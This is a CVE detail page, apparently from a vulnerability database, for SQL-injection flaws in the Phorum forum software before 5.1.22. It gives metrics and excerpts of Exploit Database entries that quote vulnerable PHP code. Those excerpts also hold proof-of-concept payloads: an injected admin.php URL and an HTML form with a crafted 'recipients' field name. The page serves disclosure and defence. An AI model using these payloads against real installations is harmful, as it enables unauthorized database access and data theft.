CVE-2007-2339 Detail

CVE-2007-2339

EPSS

0.85%V3

Vector

Network

Published

2007-04-27
14h00 +00:00

Modified

2018-10-16
12h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

Multiple SQL injection vulnerabilities in Phorum before 5.1.22 allow remote attackers to execute arbitrary SQL commands via (1) a modified recipients parameter name in (a) pm.php; (2) the curr parameter to the (b) badwords (aka censorlist) or (c) banlist module in admin.php; or (3) the "Edit groups / Add group" field in the (d) groups module in admin.php.

CVE Informations

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 29893

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation. Phorum 5.1.20 is affected; prior versions may also be vulnerable. > From source code - "include/db/mysql.php" line 3223: -------------------------------------------------- function phorum_db_del_banitem($banid) { $PHORUM = $GLOBALS["PHORUM"]; $conn = phorum_db_mysql_connect(); $sql = "DELETE FROM {$PHORUM['banlist_table']} WHERE id = $banid"; $res = mysql_query($sql, $conn); --------------------------------------------------- PoC: http://localhost/phorum.5.1.20/admin.php?module=banlist&delete=1&curr=OR ... and we will get error message:

Exploit Database EDB-ID : 29894

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

Exploit Database EDB-ID : 29892

Publication date : 2007-04-22 22h00 +00:00
Author : Janek Vind
EDB Verified : Yes

source: https://www.securityfocus.com/bid/23616/info Phorum is prone to multiple input-validation vulnerabilities, including an unauthorized-access issue, privilege-escalation issue, multiple SQL-injection issues, and cross-site scripting issues, because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify sensitive data, or exploit latent vulnerabilities in the underlying database implementation. Phorum 5.1.20 is affected; prior versions may also be vulnerable. Let's look at source code of "include/db/mysq.php" ~ line 1881 : ------------------[source code]---------------------- function phorum_db_user_get($user_id, $detailed) { $PHORUM = $GLOBALS["PHORUM"]; $conn = phorum_db_mysql_connect(); if(is_array($user_id)){ $user_ids=implode(",", $user_id); } else { $user_ids=(int)$user_id; } $users = array(); $sql = "select * from {$PHORUM['user_table']} where user_id in ($user_ids)"; $res = mysql_query($sql, $conn); if ($err = mysql_error()) phorum_db_mysql_error("$err: $sql"); ------------------[/source code]---------------------- As we can see, if "$user_id" is array, then there is no sanitize against data before using in sql query. After some research I have found a way to use this bug for sql injection. For this, first of all, potential attacker must have valid user account in specific Phorum-powered website and he/she must be logged in. And then let's try this proof-of-concept html file: ------------------[PoC exploit]----------------------- <html> <body> <form action="http://localhost/phorum.5.1.20/pm.php" method="post"> <input type="hidden" name="recipients[1) OR foobar=123/* ]" value="waraxe"> <input type="submit" name"test" value="test"> </body> </html>